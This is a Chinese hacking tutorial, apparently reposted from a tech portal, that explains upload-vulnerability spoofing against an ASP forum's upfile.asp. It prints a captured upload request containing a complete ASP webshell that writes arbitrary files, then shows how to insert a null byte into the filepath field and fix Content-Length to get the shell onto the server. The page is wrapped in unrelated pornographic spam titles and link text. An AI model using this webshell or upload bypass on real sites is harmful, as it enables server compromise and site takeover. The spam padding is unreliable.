成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

解析上傳漏洞欺騙技術

安全 黑客攻防
先我們要獲得客戶端和服務器之間傳遞的數據,事先準備好一個ASP木馬準備上傳,當然不可能成功,我們要的就是這中間我們向服務器提交的數據。一般用WsockExpert來獲得數據,由于數據太多只能把關鍵部分發出來

實際上網絡中存在著很多的漏洞,通過這些漏洞的利用黑客就可能會入侵網站的服務器,取得管理員權限。其中不少的程序都存在著上傳漏洞,通過上傳漏洞黑客入侵者便可以上傳一個ASP木馬,然后通過上傳漏洞欺騙技術來達到自己入侵的目的。接下來本篇文章就講分析一下上傳漏洞欺騙的具體原理。

POST /bbs/upfile.asp HTTP/1.1

……. 省略了N多沒用信息

 

  1. Content-Length: 1792  
  2. Connection: Keep-Alive  
  3. Cache-Control: no-cache  
  4. Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN 
  5. -----------------------------7d52191850242  
  6. Content-Disposition: form-data; name="filepath" 
  7.  
  8. uploadFace  
  9. -----------------------------7d52191850242  
  10. Content-Disposition: form-data; name="act" 
  11.  
  12. upload  
  13. -----------------------------7d52191850242  
  14. Content-Disposition: form-data; name="file1"
  15. filename="E:\木馬\asp\shell.asp" 
  16. Content-Type: text/plain  
  17.  
  18. <% dim objFSO %>  
  19. <% dim fdata %>  
  20. <% dim objCountFile %>  
  21. <% on error resume next %>  
  22. <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>  
  23. <% if Trim(request("syfdpath"))<>"" then %>  
  24. <% fdata = request("cyfddata") %>  
  25. <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>  
  26. <% objCountFile.Write fdata %>  
  27. <% if err =0 then %>  
  28. <% response.write "<font color=red><h2>成功!</h2><font>" %>  
  29. <% else %>  
  30. <% response.write "<font color=red><h1>失敗!</h1></font>" %>  
  31. <% end if %>  
  32. <% err.clear %>  
  33. <% end if %>  
  34. <% objCountFile.Close %>  
  35. <% Set objCountFile=Nothing %>  
  36. <% Set objFSO = Nothing %>  
  37. <% Response.write "<form action='' method=post>" %>  
  38. <% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>  
  39. <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>  
  40. <% Response.Write "<br>" %>  
  41. <% Response.write "地址來自" %>  
  42. <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>  
  43. <% Response.write "<br>" %>  
  44. <% Response.write "你的留言:" %>  
  45. <% Response.write "<textarea name=cyfddata
  46. cols=80 rows=10 width=32></textarea>" %>  
  47. <% Response.write "<input type=submit value=sky!!>" %>  
  48. <% Response.write "</form>" %> 

-----------------------------7d52191850242

Content-Disposition: form-data; name="fname"

E:\木馬\asp\shell.asp

-----------------------------7d52191850242

Content-Disposition: form-data; name="Submit"

上傳
-----------------------------7d52191850242--

傳遞的信息我們獲取了,下面就來修改下達到上傳漏洞欺騙目的。主要修改一下幾點:

1.Content-Disposition: form-data; name="file1"; filename="E:\木馬\asp\shell.asp"

2.Content-Disposition: form-data; name="fname"

E:\木馬\asp\shell.asp

3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我們修改成uploadFace\shell.asp后面怎么加一個空字符呢?用UltraEdit是個好方法,用16進制編輯,(因為'\0'這個字符也占一個位置,所以我們先打入一空格,然后再在UltraEdit(用Ctrl+H轉換到16進制模式下)里將就空格符的20改成00)。

4.還有一個地方也要修改,就是這句Content-Length: 1792表示提交數據的字符個數。

如果你修改了filepath的值那么這個長度1792也要變換,一個字母或者數字的長度就是1,不要忘記最后面那個空格那個也算1。

【編輯推薦】

  1. 親身體驗MS07-029漏洞入侵
  2. 解析系統泄露密碼入侵攻擊
  3. 經典后門實例之線程插入后門
  4. 經典后門實例之擴展后門
  5. 通過數據庫下載漏洞發起網絡攻擊

 

責任編輯:張啟峰 來源: 安全在線
相關推薦

2010-09-13 16:24:39

2013-04-01 10:12:39

2011-04-18 13:33:07

2011-07-13 13:43:30

2015-12-01 10:43:55

2009-12-17 10:14:14

2013-09-04 10:41:08

2019-10-31 08:43:43

ICMPARP協議ARP欺騙

2012-04-12 16:05:50

2009-12-28 12:16:54

2009-07-15 20:44:17

2011-04-06 10:23:46

2010-09-16 16:06:37

2013-11-29 15:41:08

解析漏洞ApacheApache解析漏洞

2013-06-25 10:11:18

2010-12-05 19:36:32

2010-08-03 11:08:57

2020-11-08 16:00:33

人臉識別技術安全

2018-12-18 09:20:44

欺騙技術物聯網安全物聯網

2018-10-29 07:13:45

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久久久久久久久一区二区 | 亚洲精品电影网在线观看 | 欧美大片黄 | 日本 欧美 国产 | 久久免费视频在线 | 中文字幕高清免费日韩视频在线 | 欧美一区二区在线 | 欧美精品一区二区在线观看 | 国产成人亚洲精品 | 国产精品99久久久久久大便 | 国产美女一区 | 国产香蕉视频在线播放 | 麻豆av一区二区三区久久 | 福利网址 | 青青草免费在线视频 | 欧美精品综合在线 | 综合久久一区 | 亚洲国产视频一区 | 五月婷婷 六月丁香 | 日韩一区二区视频 | 精品视频久久久久久 | 国产99久久精品一区二区永久免费 | aaaa一级毛片 | 亚洲男人网 | 色爱区综合 | 日韩一区二区三区在线观看视频 | 国产午夜在线 | 在线三级电影 | 久久精品99 | 国产精品一区二 | 毛片免费视频 | 久久亚| 中文成人无字幕乱码精品 | 99热播精品| 久久久久亚洲国产| 伊人二区 | 久久伊人一区二区 | 国产精品久久久久av | 成人特级毛片 | 黄色免费看 | 亚洲视频中文字幕 |